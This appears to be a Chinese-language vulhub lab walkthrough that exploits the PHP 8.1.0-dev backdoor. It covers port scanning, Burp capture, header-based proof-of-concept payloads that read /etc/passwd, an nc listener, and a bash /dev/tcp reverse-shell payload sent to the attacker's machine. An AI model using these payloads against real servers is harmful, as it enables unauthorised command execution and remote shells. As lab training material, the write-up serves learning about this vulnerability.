PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)

漏洞介绍

  1. 关于漏洞:PHP 8.1.0-dev 后门远程命令执行漏洞

    PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

    影响版本:PHP 8.1.0-dev

  2. 配置环境:

    靶机:centos8

    攻击机:kali

    其他:vulhub -->php–>8.1-backdoor

  3. 漏洞攻击思路:

    扫描端口,确定开启的服务,漏洞寻找,漏洞利用

信息收集

  1. nmap扫描端口

PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)_第1张图片

  1. 访问http://192.168.0.118:8080

    访问8080时显示如下hello world界面
    PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)_第2张图片
    查看源码,检查元素没有发现有用信息,用burp抓包试试

  2. burp抓包

    burp抓包,发送至Repeater,Go一下,返回包中有 X-Powered-By: PHP/8.1.0-dev,得到了php版本号

    PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)_第3张图片

  3. 查找漏洞

    百度一下 PHP/8.1.0漏洞,找到PHP-8.1.0-dev 后门命令执行漏洞
    PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)_第4张图片

漏洞利用

  1. POC验证

    User-Agentt: zerodiumvar_dump(2*3); //或者User-Agentt: zerodiumsystem(“cat /etc/passwd”);
    PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)_第5张图片
    PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)_第6张图片

  2. 监听

    nc -lvp 192.168.0.118:8080

  3. 反弹shell

    User-Agentt: zerodiumsystem(“bash -c ‘exec bash -i >& /dev/tcp/192.168.0.116/6666 0>&1’”);
    PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)_第7张图片
    反弹成功
    PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)_第8张图片

你可能感兴趣的:(vulhub,php,安全)